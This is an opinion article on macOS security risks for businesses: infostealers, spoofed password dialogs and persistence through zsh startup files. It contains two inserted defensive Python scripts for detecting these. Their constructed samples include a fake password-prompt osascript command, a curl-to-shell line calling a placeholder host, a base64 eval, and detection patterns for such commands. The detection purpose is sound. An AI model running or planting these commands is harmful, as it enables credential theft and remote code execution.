Why Macs could become an Achilles heel for businesses in 2025


By Phil Stokes*
Friday, 31 January, 2025


In recent years, Apple’s Mac computers have steadily gained favour within corporate environments. Their sleek design, user-friendly interface and perceived superior security have made them a preferred choice for businesses seeking reliable workstations.

However, as 2025 unfolds, there are growing concerns that this very perception of security could blindside organisations, leaving them vulnerable to increasingly sophisticated cyberthreats.

The myth of ‘better security’

One of the driving factors behind the rise in popularity of Macs is their reputation for being more secure than their Windows counterparts. This belief is often fuelled by the assumption that “Macs don’t get malware” — a notion that has long been debunked. Nevertheless, the idea persists, largely because of the stark contrast between the relative security track record of macOS and the overwhelming volume of malware targeting Windows systems.

Unfortunately, this perception of superior security creates a dangerous blind spot for organisations. Threat actors are well aware of these assumptions and are increasingly exploiting them.

The year 2024 saw a notable rise in macOS-focused malware, particularly crimeware like infostealers. Malicious software such as Amos Atomic, Banshee Stealer, Cuckoo Stealer and Poseidon gained prominence, employing tactics designed to exfiltrate credentials and other sensitive data in a single intrusion.

Exploiting macOS weaknesses

A key weakness in macOS lies in its ‘universal password’ model. By default, the same password is used to log in, install software and unlock the Keychain — the built-in password manager that stores all other credentials.

This design flaw makes it alarmingly easy for attackers to compromise a system, particularly when the user is also an admin user, the default setup on macOS. By spoofing a password dialog box — a task simplified by the macOS native AppleScript technology — malware can trick users into handing over their credentials. Once obtained, attackers gain access to the Keychain and, by extension, any organisation credentials stored therein.
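One way a defender can watch for the spoofed prompt just described: the script below is an added example (not code from the article or from SentinelOne) that flags process-execution events whose `osascript` command line builds a dialog with a masked input field. The event records are constructed, and the "review" heuristic for script files run from temporary or hidden paths is this example's own assumption.

```python
"""Flag process-execution events whose command line builds a password-style
AppleScript dialog, i.e. the spoofed prompt the article describes.

The events below are constructed for this example, not real telemetry."""
import re
import shlex

# "display dialog ... with hidden answer" is the AppleScript idiom for a
# masked text field, so such a dialog is asking for a secret by construction.
HIDDEN_INPUT = re.compile(r"display\s+dialog.*with\s+hidden\s+answer", re.I | re.S)
PASSWORD_WORDS = re.compile(r"password|passcode|keychain", re.I)

SAMPLE_EVENTS = [  # constructed
    {"pid": 101, "parent": "launchd", "cmd":
     "osascript -e 'display dialog \"macOS needs to update settings. Enter your "
     "password:\" default answer \"\" with hidden answer with icon caution'"},
    {"pid": 102, "parent": "Xcode", "cmd":
     "osascript -e 'display notification \"Build finished\" with title \"Xcode\"'"},
    {"pid": 103, "parent": "Terminal", "cmd": "/usr/bin/curl -s https://example.invalid/u"},
    {"pid": 104, "parent": "Updater", "cmd": "osascript /tmp/.x.scpt"},
]

def classify(cmd):
    """Return a severity for one command line, or None if it looks benign."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        argv = cmd.split()
    if not argv or not argv[0].endswith("osascript"):
        return None
    if HIDDEN_INPUT.search(cmd):
        # Password wording in the prompt text raises confidence further.
        return "high" if PASSWORD_WORDS.search(cmd) else "medium"
    # Heuristic (this example's assumption, not a rule from the article): a
    # script file run from a temp or hidden path cannot be inspected here.
    script = next((a for a in argv[1:] if not a.startswith("-")), "")
    if script.startswith(("/tmp/", "/private/tmp/", "/var/folders/")) or "/." in script:
        return "review"
    return None

def detect(events):
    """Return (pid, severity) for every event worth alerting on."""
    return [(e["pid"], sev) for e in events if (sev := classify(e["cmd"])) is not None]

if __name__ == "__main__":
    for pid, sev in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {sev}")
```

On a real fleet the same `classify()` would run over process-start telemetry from an endpoint agent rather than the inline list.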

The implications of these weaknesses are far-reaching. Unlike legacy malware that seeks persistence on a device, modern macOS crimeware often operates on a ‘smash-and-grab’ model. It’s designed to extract as much valuable information as possible before the intrusion is detected.

Defensive strategies for organisations

Addressing these challenges requires a proactive approach to macOS security. Two essential defensive strategies organisations should prioritise are:

  1. Adopt password managers: Encourage or mandate the use of third-party password managers instead of relying on Apple’s built-in Keychain and Passwords app. Separating the login password from access to the passwords database is crucial.
  2. Deploy robust security software: The macOS native malware detection system — XProtect — is updated infrequently and only blocks a small proportion of known malware, leaving significant security gaps. Organisations should invest in comprehensive endpoint protection solutions to provide real-time threat detection and mitigation capabilities.

The rise of persistent threats

While crimeware thrives on rapid data exfiltration, more advanced adversaries, such as nation-state actors, often seek to maintain persistence within compromised systems.

Apple’s introduction of user notifications for background login items in macOS Ventura forced attackers to evolve their tactics. They now resort to sophisticated methods, including:

  • ‘Trojanising’ popular software: Malicious actors compromise frequently used applications to gain long-term access to systems.
  • Targeting development environments: Tools like Visual Studio and Xcode can be targeted to inject malicious code into software development pipelines, while package managers like PyPI, NPM and Crates have increasingly been targeted by threat actors for the same reason.
  • Leveraging legacy Unix components: Attackers plant commands in zsh startup files such as zshenv and zshrc, which run every time a shell starts, to maintain undetected access.
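As an added example for the last bullet (not code from the article), this script audits the zsh startup files for lines that fetch remote code, decode a payload, or background a program from a hidden path. The sample `~/.zshrc` contents and the suspicious-line patterns are constructed assumptions of this example, not indicators taken from the article.

```python
"""Audit zsh startup files for lines that look like planted persistence.
SAMPLE_ZSHRC is constructed for this example; on a real Mac audit_files()
reads the user's and the system's zsh startup files instead."""
import os
import re

# zsh sources these on every shell start (zshenv even for non-interactive
# shells), so a command planted here re-runs each time a terminal opens.
STARTUP_FILES = ["/etc/zshenv", "/etc/zprofile", "/etc/zshrc", "/etc/zlogin",
                 "~/.zshenv", "~/.zprofile", "~/.zshrc", "~/.zlogin"]

# Heuristics chosen for this example, not rules taken from the article.
SUSPICIOUS = [
    ("remote fetch piped to a shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("encoded or eval'd payload", re.compile(r"base64\s+(-d|--decode)\b|\beval\b")),
    ("background job from temp/hidden path", re.compile(r"(/tmp/|/var/folders/|/\.[\w-]+/).*&\s*$")),
]

def audit_text(text, source="<inline>"):
    """Return (source, line_no, reason, line) for each suspicious non-comment line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for reason, pattern in SUSPICIOUS:
            if pattern.search(stripped):
                hits.append((source, no, reason, stripped))
                break  # one reason per line is enough for triage
    return hits

def audit_files(paths=STARTUP_FILES):
    # Skip files that do not exist so the audit works on any machine.
    hits = []
    for p in paths:
        full = os.path.expanduser(p)
        if os.path.isfile(full):
            with open(full, errors="replace") as fh:
                hits += audit_text(fh.read(), full)
    return hits

SAMPLE_ZSHRC = """\
# constructed sample ~/.zshrc with three planted lines
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
nohup /Users/Shared/.cache/helper >/dev/null 2>&1 &
curl -fsSL https://example.invalid/u | sh
eval "$(echo aGVsbG8= | base64 -d)"
"""

for hit in audit_text(SAMPLE_ZSHRC, "~/.zshrc"):
    print("%s:%d: %s: %s" % hit)
```

Running `audit_files()` with its default list covers the same files an attacker would edit on the local machine; any hit is a line to review by hand, not proof of compromise.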

These evolving tactics underscore the need for continuous vigilance. Productivity apps, integrated development environments (IDEs) and any mandated software can become avenues for exploitation. As a result, security policies should be reviewed regularly, and exceptions or ‘allow lists’ should be kept to a minimum. Furthermore, monitoring for anomalous behaviour — such as unexpected process creation or unusual network traffic — is critical to identifying and mitigating persistent threats.

Rethinking the ‘secure-by-design’ narrative

Despite their reputation, Macs are no more ‘secure by design’ than any other computing platform. The notion that macOS devices are inherently immune to cyber attacks has been disproven time and again. Though the path to compromise may be different to Windows PCs, threat actors have increasingly found their way into organisations’ networks through attacks on Macs and Mac users.

Defending against these attacks means adopting a comprehensive security posture that treats Macs as primary targets, rather than assuming they are safe by default. Investing in regular employee training, enforcing strict security protocols, and maintaining up-to-date defences are crucial steps in mitigating risks, as for any computing system.

A growing appeal

As Macs continue to gain traction in the corporate world, their appeal to cybercriminals will only grow. The illusion of superior security, coupled with inherent weaknesses, makes them an attractive target for threat actors. Organisations must recognise that security is not a static attribute but a continuous process. By addressing macOS-specific challenges head-on, businesses can safeguard their systems and data, ensuring that Macs do not become their Achilles heel in 2025.

*Phil Stokes is a Threat Researcher at SentinelOne, specialising in macOS threat intelligence, platform vulnerabilities and malware analysis. He began his journey into macOS security as a software developer, creating end-user troubleshooting and security tools just at the time when macOS adware and commodity malware first began appearing on the platform. Phil has been closely following the development of macOS threats as well as researching Mac software and OS vulnerabilities since 2014.

Image credit: istock.com/asbe